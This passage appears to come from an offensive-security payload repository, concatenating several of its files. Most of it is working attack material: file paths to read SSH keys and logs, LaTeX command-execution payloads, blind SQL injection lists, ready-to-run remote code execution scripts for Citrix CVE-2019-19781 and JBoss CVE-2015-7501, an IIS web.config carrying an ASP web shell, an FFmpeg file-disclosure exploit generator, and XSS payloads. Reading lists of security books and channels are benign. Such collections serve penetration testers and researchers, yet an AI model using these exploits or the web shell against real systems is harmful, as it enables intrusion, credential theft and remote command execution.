 8 | /etc/apache2/ports.conf
 9 | /etc/apache2/sites-available/default
10 | /etc/httpd/conf/httpd.conf
11 | /etc/httpd/conf.d
12 | /etc/httpd/logs/access.log
13 | /etc/httpd/logs/access_log
14 | /etc/httpd/logs/error.log
15 | /etc/httpd/logs/error_log
16 | /etc/init.d/apache2
17 | /etc/mysql/my.cnf
18 | /etc/nginx.conf
19 | /opt/lampp/logs/access_log
20 | /opt/lampp/logs/error_log
21 | /opt/lamp/log/access_log
22 | /opt/lamp/logs/error_log
23 | /proc/self/environ
24 | /proc/version
25 | /proc/cmdline
26 | /proc/mounts
27 | /proc/config.gz
28 | /root/.bashrc
29 | /root/.bash_history
30 | /root/.ssh/authorized_keys
31 | /root/.ssh/id_rsa
32 | /root/.ssh/id_rsa.keystore
33 | /root/.ssh/id_rsa.pub
34 | /root/.ssh/known_hosts
35 | /usr/local/apache/htdocs/index.html
36 | /usr/local/apache/conf/httpd.conf
37 | /usr/local/apache/conf/extra/httpd-ssl.conf
38 | /usr/local/apache/logs/error_log
39 | /usr/local/apache/logs/access_log
40 | /usr/local/apache/bin/apachectl
41 | /usr/local/apache2/htdocs/index.html
42 | /usr/local/apache2/conf/httpd.conf
43 | /usr/local/apache2/conf/extra/httpd-ssl.conf
44 | /usr/local/apache2/logs/error_log
45 | /usr/local/apache2/logs/access_log
46 | /usr/local/apache2/bin/apachectl
47 | /usr/local/etc/nginx/nginx.conf
48 | /usr/local/nginx/conf/nginx.conf
49 | /var/apache/logs/access_log
50 | /var/apache/logs/access.log
51 | /var/apache/logs/error_log
52 | /var/apache/logs/error.log
53 | /var/log/apache/access.log
54 | /var/log/apache/access_log
55 | /var/log/apache/error.log
56 | /var/log/apache/error_log
57 | /var/log/httpd/error_log
58 | /var/log/httpd/access_log
59 | /var/log/nginx/access_log
60 | /var/log/nginx/access.log
61 | /var/log/nginx/error_log
62 | /var/log/nginx/error.log


--------------------------------------------------------------------------------
/LaTeX Injection/README.md:
--------------------------------------------------------------------------------
 1 | # LaTex Injection
 2 | 
 3 | ## Read file
 4 | 
 5 | ```bash
 6 | \input{/etc/passwd}
 7 | \include{password} # load .tex file
 8 | ```
 9 | 
10 | Read single lined file
11 | 
12 | ```bash
13 | \newread\file
14 | \openin\file=/etc/issue
15 | \read\file to\line
16 | \text{\line}
17 | \closein\file
18 | ```
19 | 
20 | Read multiple lined file
21 | 
22 | ```bash
23 | \newread\file
24 | \openin\file=/etc/passwd
25 | \loop\unless\ifeof\file
26 |     \read\file to\fileline
27 |     \text{\fileline}
28 | \repeat
29 | \closein\file
30 | ```
31 | 
32 | Read text file, keep the formatting
33 | 
34 | ```bash
35 | \usepackage{verbatim}
36 | \verbatiminput{/etc/passwd}
37 | ```
38 | 
39 | ## Write file
40 | 
41 | ```bash
42 | \newwrite\outfile
43 | \openout\outfile=cmd.tex
44 | \write\outfile{Hello-world}
45 | \closeout\outfile
46 | ```
47 | 
48 | ## Command execution
49 | 
50 | The input of the command will be redirected to stdin, use a temp file to get it.
51 | 
52 | ```bash
53 | \immediate\write18{env > output}
54 | \input{output}
55 | ```
56 | 
57 | If you get any LaTex error, consider using base64 to get the result without bad characters
58 | 
59 | ```bash
60 | \immediate\write18{env | base64 > test.tex}
61 | \input{text.tex}
62 | ```
63 | 
64 | ```bash
65 | \input|ls|base4
66 | \input{|"/bin/hostname"}
67 | ```
68 | 
69 | ## Cross Site Scripting
70 | 
71 | From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) 
72 | ```bash
73 | \url{javascript:alert(1)}
74 | \href{javascript:alert(1)}{placeholder}
75 | ```
76 | 
77 | Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$`
78 | 
79 | ## References
80 | 
81 | * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
82 | * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
83 | * [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)


--------------------------------------------------------------------------------
/YOUTUBE.md:
--------------------------------------------------------------------------------
 1 | # Youtube
 2 | 
 3 | ## Channels
 4 | 
 5 | - [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
 6 | - [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
 7 | - [GynvaelEN - Podcasts about CTFs, computer security, programing and similar things.](https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg)
 8 | - [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw)
 9 | - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
10 | - [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A)
11 | - [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg)
12 | - [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained)
13 | - [STÖK](https://www.youtube.com/c/STOKfredrik)
14 | - [Defcon](https://www.youtube.com/user/DEFCONConference)
15 | - [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q)
16 | - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
17 | - [Nahamsec](https://www.youtube.com/c/Nahamsec)
18 | - [Hackerone](https://www.youtube.com/channel/UCsgzmECky2Q9lQMWzDwMhYw)
19 | - [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q)
20 | - [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw)
21 | - [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ)
22 | 
23 | ## Conferences
24 | 
25 | - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
26 | - [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
27 | - [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
28 | - [The Conscience of a Hacker](https://www.youtube.com/watch?v=0tEnnvZbYek)
29 | - [Defcon 2020 Talks](https://www.youtube.com/user/DEFCONConference/videos)
30 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt:
--------------------------------------------------------------------------------
 1 |  and 0=benchmark(3000000,MD5(1))%20/*
 2 |  and 0=benchmark(3000000,MD5(1))%20--
 3 |  and 0=benchmark(3000000,MD5(1))%20%23
 4 | ' and 0=benchmark(3000000,MD5(1))%20/*
 5 | ' and 0=benchmark(3000000,MD5(1))%20--
 6 | ' and 0=benchmark(3000000,MD5(1))%20%23
 7 | " and 0=benchmark(3000000,MD5(1))%20/*
 8 | " and 0=benchmark(3000000,MD5(1))%20--
 9 | " and 0=benchmark(3000000,MD5(1))%20%23
10 | ) and 0=benchmark(3000000,MD5(1))%20/*
11 | ) and 0=benchmark(3000000,MD5(1))%20--
12 | ) and 0=benchmark(3000000,MD5(1))%20%23
13 | )) and 0=benchmark(3000000,MD5(1))%20/*
14 | )) and 0=benchmark(3000000,MD5(1))%20--
15 | )) and 0=benchmark(3000000,MD5(1))%20%23
16 | ))) and 0=benchmark(3000000,MD5(1))%20/*
17 | ))) and 0=benchmark(3000000,MD5(1))%20--
18 | ))) and 0=benchmark(3000000,MD5(1))%20%23
19 | )))) and 0=benchmark(3000000,MD5(1))%20/*
20 | )))) and 0=benchmark(3000000,MD5(1))%20--
21 | )))) and 0=benchmark(3000000,MD5(1))%20%23
22 | ') and 0=benchmark(3000000,MD5(1))%20/*
23 | ') and 0=benchmark(3000000,MD5(1))%20--
24 | ') and 0=benchmark(3000000,MD5(1))%20%23
25 | ") and 0=benchmark(3000000,MD5(1))%20/*
26 | ") and 0=benchmark(3000000,MD5(1))%20--
27 | ") and 0=benchmark(3000000,MD5(1))%20%23
28 | ')) and 0=benchmark(3000000,MD5(1))%20/*
29 | ')) and 0=benchmark(3000000,MD5(1))%20--
30 | ')) and 0=benchmark(3000000,MD5(1))%20%23
31 | ")) and 0=benchmark(3000000,MD5(1))%20/*
32 | ")) and 0=benchmark(3000000,MD5(1))%20--
33 | ")) and 0=benchmark(3000000,MD5(1))%20%23
34 | '))) and 0=benchmark(3000000,MD5(1))%20/*
35 | '))) and 0=benchmark(3000000,MD5(1))%20--
36 | '))) and 0=benchmark(3000000,MD5(1))%20%23
37 | "))) and 0=benchmark(3000000,MD5(1))%20/*
38 | "))) and 0=benchmark(3000000,MD5(1))%20--
39 | "))) and 0=benchmark(3000000,MD5(1))%20%23
40 | ')))) and 0=benchmark(3000000,MD5(1))%20/*
41 | ')))) and 0=benchmark(3000000,MD5(1))%20--
42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23
43 | ")))) and 0=benchmark(3000000,MD5(1))%20/*
44 | ")))) and 0=benchmark(3000000,MD5(1))%20--
45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23


--------------------------------------------------------------------------------
/SQL Injection/Intruder/payloads-sql-blind-MySQL-WHERE:
--------------------------------------------------------------------------------
 1 |  and 0=benchmark(3000000,MD5(1))%20/*
 2 |  and 0=benchmark(3000000,MD5(1))%20--
 3 |  and 0=benchmark(3000000,MD5(1))%20%23
 4 | ' and 0=benchmark(3000000,MD5(1))%20/*
 5 | ' and 0=benchmark(3000000,MD5(1))%20--
 6 | ' and 0=benchmark(3000000,MD5(1))%20%23
 7 | " and 0=benchmark(3000000,MD5(1))%20/*
 8 | " and 0=benchmark(3000000,MD5(1))%20--
 9 | " and 0=benchmark(3000000,MD5(1))%20%23
10 | ) and 0=benchmark(3000000,MD5(1))%20/*
11 | ) and 0=benchmark(3000000,MD5(1))%20--
12 | ) and 0=benchmark(3000000,MD5(1))%20%23
13 | )) and 0=benchmark(3000000,MD5(1))%20/*
14 | )) and 0=benchmark(3000000,MD5(1))%20--
15 | )) and 0=benchmark(3000000,MD5(1))%20%23
16 | ))) and 0=benchmark(3000000,MD5(1))%20/*
17 | ))) and 0=benchmark(3000000,MD5(1))%20--
18 | ))) and 0=benchmark(3000000,MD5(1))%20%23
19 | )))) and 0=benchmark(3000000,MD5(1))%20/*
20 | )))) and 0=benchmark(3000000,MD5(1))%20--
21 | )))) and 0=benchmark(3000000,MD5(1))%20%23
22 | ') and 0=benchmark(3000000,MD5(1))%20/*
23 | ') and 0=benchmark(3000000,MD5(1))%20--
24 | ') and 0=benchmark(3000000,MD5(1))%20%23
25 | ") and 0=benchmark(3000000,MD5(1))%20/*
26 | ") and 0=benchmark(3000000,MD5(1))%20--
27 | ") and 0=benchmark(3000000,MD5(1))%20%23
28 | ')) and 0=benchmark(3000000,MD5(1))%20/*
29 | ')) and 0=benchmark(3000000,MD5(1))%20--
30 | ')) and 0=benchmark(3000000,MD5(1))%20%23
31 | ")) and 0=benchmark(3000000,MD5(1))%20/*
32 | ")) and 0=benchmark(3000000,MD5(1))%20--
33 | ")) and 0=benchmark(3000000,MD5(1))%20%23
34 | '))) and 0=benchmark(3000000,MD5(1))%20/*
35 | '))) and 0=benchmark(3000000,MD5(1))%20--
36 | '))) and 0=benchmark(3000000,MD5(1))%20%23
37 | "))) and 0=benchmark(3000000,MD5(1))%20/*
38 | "))) and 0=benchmark(3000000,MD5(1))%20--
39 | "))) and 0=benchmark(3000000,MD5(1))%20%23
40 | ')))) and 0=benchmark(3000000,MD5(1))%20/*
41 | ')))) and 0=benchmark(3000000,MD5(1))%20--
42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23
43 | ")))) and 0=benchmark(3000000,MD5(1))%20/*
44 | ")))) and 0=benchmark(3000000,MD5(1))%20--
45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23
46 | 


--------------------------------------------------------------------------------
/CVE Exploits/Citrix CVE-2019-19781.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # https://github.com/mpgn/CVE-2019-19781
 3 | # # #
 4 | 
 5 | import requests
 6 | import string
 7 | import random
 8 | import re
 9 | import sys
10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
12 | 
13 | print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
14 | print("Found by Mikhail Klyuchnikov")
15 | print("")
16 | 
17 | if len(sys.argv) < 2:
18 |   print("[-] No URL provided")
19 |   sys.exit(0)
20 | 
21 | while True:
22 |     try:
23 |       command = input("command > ")
24 | 
25 |       random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
26 |       print("[+] Adding bookmark", random_xml + ".xml")
27 | 
28 |       burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
29 |       burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
30 |                       random_xml, "NSC_NONCE": "c", "Connection": "close"}
31 |       burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
32 |       r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
33 | 
34 |       if r.status_code == 200:
35 |         print("[+] Bookmark added")
36 |       else:
37 |         print("\n[-] Target not vulnerable or something went wrong")
38 |         sys.exit(0)
39 | 
40 |       burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
41 |       burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
42 |                        random_xml, "NSC_NONCE": "c", "Connection": "close"}
43 |       r = requests.get(burp0_url, headers=burp0_headers,verify=False)
44 | 
45 |       replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
46 |       print("[+] Result of the command: \n")
47 |       print(replaced)
48 | 
49 |     except KeyboardInterrupt:
50 |             print("Exiting...")
51 |             break


--------------------------------------------------------------------------------
/BOOKS.md:
--------------------------------------------------------------------------------
 1 | # Book's list
 2 | 
 3 | Grab a book and relax, these ones are the best security books (in my opinion).
 4 | 
 5 | - [Web Hacking 101](https://leanpub.com/web-hacking-101)
 6 | - [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
 7 | - [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
 8 | - [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
 9 | - [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
10 | - [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
11 | - [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
12 | - [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
13 | - [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
14 | - [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
15 | - [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
16 | - [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
17 | - [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
18 | - [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
19 | - [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
20 | - [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
21 | - [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
22 | - [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
23 | 


--------------------------------------------------------------------------------
/Race Condition/README.md:
--------------------------------------------------------------------------------
 1 | # Race Condition
 2 | 
 3 | > Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language. 
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Turbo Intruder Examples](#turbo-intruder-examples)
 9 | * [References](#references)
10 | 
11 | ## Tools
12 | 
13 | * [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder)
14 | 
15 | ## Turbo Intruder Examples
16 | 
17 | 1. Send request to turbo intruder
18 | 2. Use this python code as a payload of the turbo intruder
19 |     ```python
20 |     def queueRequests(target, wordlists):
21 |         engine = RequestEngine(endpoint=target.endpoint,
22 |                             concurrentConnections=30,
23 |                             requestsPerConnection=30,
24 |                             pipeline=False
25 |                             )
26 | 
27 |     for i in range(30):
28 |         engine.queue(target.req, i)
29 |             engine.queue(target.req, target.baseInput, gate='race1')
30 | 
31 | 
32 |         engine.start(timeout=5)
33 |     engine.openGate('race1')
34 | 
35 |         engine.complete(timeout=60)
36 | 
37 | 
38 |     def handleResponse(req, interesting):
39 |         table.add(req)
40 |     ```
41 | 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
42 | 4. Click "Attack"
43 | 
44 | 
45 | ## References
46 | 
47 | * [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
48 | * [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
49 | * [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration IIS web.config/web.web.config:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <configuration>
 3 |    <system.webServer>
 4 |       <handlers accessPolicy="Read, Script, Write">
 5 |          <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
 6 |       </handlers>
 7 |       <security>
 8 |          <requestFiltering>
 9 |             <fileExtensions>
10 |                <remove fileExtension=".config" />
11 |             </fileExtensions>
12 |             <hiddenSegments>
13 |                <remove segment="web.config" />
14 |             </hiddenSegments>
15 |          </requestFiltering>
16 |       </security>
17 |    </system.webServer>
18 | </configuration>
19 | <!--
20 | <% Response.write("-"&"->")%>
21 | <%
22 | Set oScript = Server.CreateObject("WSCRIPT.SHELL")
23 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
24 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
25 | 
26 | Function getCommandOutput(theCommand)
27 |     Dim objShell, objCmdExec
28 |     Set objShell = CreateObject("WScript.Shell")
29 |     Set objCmdExec = objshell.exec(thecommand)
30 | 
31 |     getCommandOutput = objCmdExec.StdOut.ReadAll
32 | end Function
33 | %>
34 | 
35 | <BODY>
36 | <FORM action="" method="GET">
37 | <input type="text" name="cmd" size=45 value="<%= szCMD %>">
38 | <input type="submit" value="Run">
39 | </FORM>
40 | 
41 | <PRE>
42 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
43 | <%Response.Write(Request.ServerVariables("server_name"))%>
44 | <p>
45 | <b>The server's port:</b>
46 | <%Response.Write(Request.ServerVariables("server_port"))%>
47 | </p>
48 | <p>
49 | <b>The server's software:</b>
50 | <%Response.Write(Request.ServerVariables("server_software"))%>
51 | </p>
52 | <p>
53 | <b>The server's software:</b>
54 | <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
55 | <% szCMD = request("cmd")
56 | thisDir = getCommandOutput("cmd /c" & szCMD)
57 | Response.Write(thisDir)%>
58 | </p>
59 | <br>
60 | </BODY>
61 | 
62 | 
63 | 
64 | <%Response.write("<!-"&"-") %>
65 | -->
66 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/CVE Ffmpeg HLS/gen_avi_bypass.py:
--------------------------------------------------------------------------------
 1 | import struct
 2 | import argparse
 3 | 
 4 | AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST    movi"
 5 | 
 6 | 
 7 | def make_txt_packet(content, fake_packets=50, fake_packet_len=200):
 8 |     content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content
 9 |     packet = b'00tx' + struct.pack('<I', len(content)) + content
10 |     dcpkt = b'00dc' + struct.pack('<I', fake_packet_len) + b'\x00' * fake_packet_len
11 |     return packet + dcpkt * fake_packets
12 | 
13 | TXT_PLAYLIST = """#EXTM3U
14 | #EXT-X-MEDIA-SEQUENCE:0
15 | #EXTINF:1.0,
16 | #EXT-X-BYTERANGE: 0
17 | {txt}
18 | #EXTINF:1.0,
19 | {file}
20 | #EXT-X-ENDLIST"""
21 | 
22 | def prepare_txt_packet(txt, filename):
23 |     return make_txt_packet(TXT_PLAYLIST.format(txt=txt, file=filename).encode())
24 | 
25 | # TXT_LIST = ['/usr/share/doc/gnupg/Upgrading_From_PGP.txt', '/usr/share/doc/mount/mount.txt', '/etc/pki/nssdb/pkcs11.txt', '/usr/share/gnupg/help.txt']
26 | 
27 | if __name__ == "__main__":
28 |     parser = argparse.ArgumentParser('HLS AVI TXT exploit generator')
29 |     parser.add_argument('filename', help='file that should be read from convertion instance')
30 |     parser.add_argument('output_avi', help='where to save the avi')
31 |     parser.add_argument('--txt', help='any .txt file that exist on target system', default='GOD.txt')
32 |     args = parser.parse_args()
33 |     avi = AVI_HEADER + prepare_txt_packet(args.txt, args.filename)
34 |     output_name = args.output_avi
35 | 
36 |     with open(output_name, 'wb') as f:
37 |         f.write(avi)
38 | 
39 | 


--------------------------------------------------------------------------------
/XSS Injection/XSS with Relative Path Overwrite.md:
--------------------------------------------------------------------------------
 1 | # XSS with Relative Path Overwrite - IE 8/9 and lower
 2 | 
 3 | You need these 3 components
 4 | 
 5 | ```javascript
 6 | 1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))}
 7 | 2) URL Rewriting.
 8 | 3) Relative addressing to CSS style sheet : ../style.css
 9 | ```
10 | 
11 | A little example
12 | 
13 | ```html
14 | http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
15 | <html>
16 | <head>
17 | <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
18 | <link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
19 | </head>
20 | <body>
21 | Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
22 | </body>
23 | </html>
24 | ```
25 | 
26 | Explanation of the vulnerability
27 | 
28 | > The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
29 | > A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
30 | 
31 | Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
32 | Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
33 | MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`
34 | 
35 | From : `http://www.thespanner.co.uk/2014/03/21/rpo/`
36 | 
37 | ## Mutated XSS for Browser IE8/IE9
38 | 
39 | ```javascript
40 | <listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
41 | <script>alert(document.getElementById('x').innerHTML)</script>
42 | ```
43 | 
44 | IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
45 | 
46 | 
47 | ## References
48 | 
49 | - [TODO](TODO)


--------------------------------------------------------------------------------
/CVE Exploits/JBoss CVE-2015-7501.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python2
 2 | 
 3 | # Jboss Java Deserialization RCE (CVE-2015-7501)
 4 | # Made with <3 by @byt3bl33d3r
 5 | 
 6 | from __future__ import print_function
 7 | import requests
 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
 9 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
10 | 
11 | import argparse
12 | import sys, os
13 | #from binascii import hexlify, unhexlify
14 | from subprocess import check_output
15 | 
16 | ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
17 | ysoserial_path = None
18 | 
19 | parser = argparse.ArgumentParser()
20 | parser.add_argument('target', type=str, help='Target IP')
21 | parser.add_argument('command', type=str, help='Command to run on target')
22 | parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
23 | parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
24 | 
25 | if len(sys.argv) < 2:
26 |     parser.print_help()
27 |     sys.exit(1)
28 | 
29 | args = parser.parse_args()
30 | 
31 | if not args.ysoserial_path:
32 |     for path in ysoserial_default_paths:
33 |         if os.path.exists(path):
34 |             ysoserial_path = path
35 | else:
36 |     if os.path.exists(args.ysoserial_path):
37 |         ysoserial_path = args.ysoserial_path
38 | 
39 | if ysoserial_path is None:
40 |     print('[-] Could not find ysoserial JAR file')
41 |     sys.exit(1)
42 | 
43 | if len(args.target.split(":")) != 2:
44 |     print('[-] Target must be in format IP:PORT')
45 |     sys.exit(1)
46 | 
47 | if not args.command:
48 |     print('[-] You must specify a command to run')
49 |     sys.exit(1)
50 | 
51 | ip, port = args.target.split(':')
52 | 
53 | print('[*] Target IP: {}'.format(ip))
54 | print('[*] Target PORT: {}'.format(port))
55 | 
56 | gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
57 | 
58 | r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
59 | 
60 | if r.status_code == 200:
61 |     print('[+] Command executed successfully')
62 | 
63 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/CVE Ffmpeg HLS/README.md:
--------------------------------------------------------------------------------
 1 | # FFmpeg HLS vulnerability
 2 | FFmpeg is an open source software used for processing audio and video formats. You can use a malicious HLS playlist inside an AVI video to read arbitrary files.
 3 | 
 4 | ## Exploits
 5 | ```
 6 | 1. `./gen_xbin_avi.py file://<filename> file_read.avi`
 7 | 2. Upload `file_read.avi` to some website that processes videofiles
 8 | 3. (on server side, done by the videoservice) `ffmpeg -i file_read.avi output.mp4`
 9 | 4. Click "Play" in the videoservice.
10 | 5. If you are lucky, you'll the content of `<filename>` from the server.
11 | ```
12 | 
13 | ## How it works (Explanations from neex - Hackerone links)
14 | the script creates an AVI that contains an HLS playlist inside GAB2. The playlist generated by this script looks like this:
15 | ```
16 | #EXTM3U
17 | #EXT-X-MEDIA-SEQUENCE:0
18 | #EXTINF:1.0
19 | GOD.txt
20 | #EXTINF:1.0
21 | /etc/passwd
22 | #EXT-X-ENDLIST
23 | ```
24 | To process a playlist ffmpeg concatenates all segments and processes it as single file.
25 | To determine the type of this file FFmpeg uses the first segment of the playlist.
26 | FFmpeg processes .txt files in a special way. It tries to show a screen capture of a tty printing this file.    
27 | 
28 | So, the playlist above will be processed as follows:
29 | FFmpeg sees #EXTM3U signature inside GAB2 chunk and determines file type as HLS playlist.
30 | The file GOD.txt doesn't even exist, but it's name is enough for FFmpeg to detect file type as .txt.
31 | FFmpeg concatenates the contents of all segments of the playlist. As only one of two segments actually exists, the result of concatenation is just the contents of the file we want to retrieve.
32 | Because the type of this concatenation is .txt, FFmpeg draws a tty that prints the file.
33 | 
34 | ## Thanks to
35 | * [Hackerone - Local File Disclosure via ffmpeg @sxcurity](https://hackerone.com/reports/242831)
36 | * [Hackerone - Another local file disclosure via ffmpeg](https://hackerone.com/reports/243470)
